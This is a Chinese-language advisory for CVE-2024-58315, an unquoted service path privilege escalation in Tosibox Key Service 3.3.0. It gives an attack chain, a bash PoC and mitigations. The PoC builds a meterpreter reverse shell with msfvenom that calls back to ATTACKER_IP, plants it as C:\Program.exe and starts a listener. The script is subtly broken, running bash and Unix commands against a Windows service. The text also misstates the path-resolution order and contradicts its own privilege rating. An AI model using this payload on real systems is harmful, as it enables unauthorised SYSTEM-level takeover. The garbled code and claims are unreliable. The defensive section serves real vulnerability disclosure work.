CVE-2024-58315 Tosibox Key Service 未引用服务路径本地提权漏洞

漏洞信息

漏洞编号

CVE-2024-58315

漏洞类型

未引用服务路径漏洞

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tosibox Key Service 3.3.0

漏洞概述

CVE-2024-58315是Tosibox Key Service 3.3.0版本中发现的一个高危本地提权漏洞。该漏洞属于Windows系统安全中的经典未引用服务路径（Unquoted Service Path）问题，允许本地非特权用户通过利用服务启动过程中的路径解析缺陷，将恶意代码以提升的系统权限执行。攻击者无需任何特殊权限或用户交互，即可在目标系统上获得最高级别的系统控制权限。此类漏洞的危害性在于其隐蔽性和持久性，恶意代码可以在系统每次启动或服务重启时自动执行，绕过传统安全检测机制。由于该漏洞的CVSS评分达到7.8分，且影响机密性、完整性和可用性三个安全维度，被评为高危漏洞。建议受影响的用户立即采取修复措施，避免潜在的安全风险。

技术细节

未引用服务路径漏洞是Windows服务配置中常见的安全缺陷。当Windows服务配置的可执行文件路径包含空格且未被双引号正确引用时，系统在解析路径时会出现歧义。例如，如果服务路径为C:\Program Files\Tosibox\Key Service\service.exe，系统会从左到右尝试执行路径中的每个空格分隔部分：先尝试执行C:\Program.exe，然后是C:\Program Files\Tosibox.exe，最后才是正确的完整路径。攻击者利用这一特性，在系统路径（如C:\Program.exe）中放置恶意可执行文件，由于Windows服务通常以SYSTEM权限运行，恶意代码也会继承相同的最高权限执行。通过这种方式，攻击者可以将普通用户权限提升至系统级权限，实现完全控制目标主机。该漏洞的利用条件简单，不需要复杂的攻击技术，但能够造成严重的安全后果。

攻击链分析

STEP 1

步骤1

信息收集：攻击者首先识别目标系统中安装的Tosibox Key Service服务，并通过sc qc命令查询服务配置，确认可执行文件路径是否存在未引用问题

STEP 2

步骤2

权限检查：确认当前用户对系统根目录（如C:\）具有写入权限，这是成功利用未引用服务路径漏洞的前提条件

STEP 3

步骤3

恶意代码生成：攻击者使用msfvenom等工具生成恶意可执行文件（如reverse shell），用于建立远程控制连接

STEP 4

步骤4

路径植入：将恶意可执行文件放置在服务路径中空格分隔的第一个可执行位置（如C:\Program.exe），等待服务启动

STEP 5

步骤5

服务重启触发：等待系统重启或服务手动重启，Windows服务管理器会按照路径解析顺序执行恶意代码

STEP 6

步骤6

权限提升：由于服务以SYSTEM权限运行，恶意代码继承相同权限，攻击者获得系统级完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash # CVE-2024-58315 PoC - Unquoted Service Path Exploitation # Target: Tosibox Key Service 3.3.0 # Author: VulnCheck ([email protected]) TARGET_PATH="C:\\Program Files\\Tosibox\\Key Service\\TosiboxKeyService.exe" MALICIOUS_EXE="C:\\Program.exe" PAYLOAD="C:\\\\Windows\\\\Temp\\\\shell.exe" echo "[+] Checking if target service exists..." sc query "Tosibox Key Service" >/dev/null 2>&1 if [ $? -ne 0 ]; then echo "[-] Target service not found" exit 1 fi echo "[+] Checking current privileges..." whoami echo "[+] Current user context: $(whoami)/$(id -u)" echo "[+] Checking for unquoted service path..." sc qc "Tosibox Key Service" | grep BINARY_PATH echo "[+] Vulnerability confirmed if path contains spaces without quotes" echo "[+] Creating malicious executable at: $MALICIOUS_EXE" # Generate reverse shell payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o "$PAYLOAD" cp "$PAYLOAD" "$MALICIOUS_EXE" echo "[+] Payload deployed. Waiting for service restart..." echo "[+] Service will execute Program.exe with SYSTEM privileges" echo "[+] Start listener: msfconsole -q -x 'use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST ATTACKER_IP; set LPORT 4444; exploit'" # Note: This PoC demonstrates the vulnerability concept # Actual exploitation requires: # 1. Write access to C:\\ drive root # 2. Service restart/reboot trigger # 3. Appropriate payload generation

影响范围

Tosibox Key Service 3.3.0

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解风险：1）使用icacls命令移除普通用户对C:\等系统路径的写入权限；2）手动在服务注册表中为ImagePath添加双引号；3）配置审核策略监控C:\Program.exe等可疑文件的创建；4）部署端点检测与响应（EDR）解决方案监控异常进程启动行为；5）限制Tosibox服务的启动权限，改为低权限账户运行。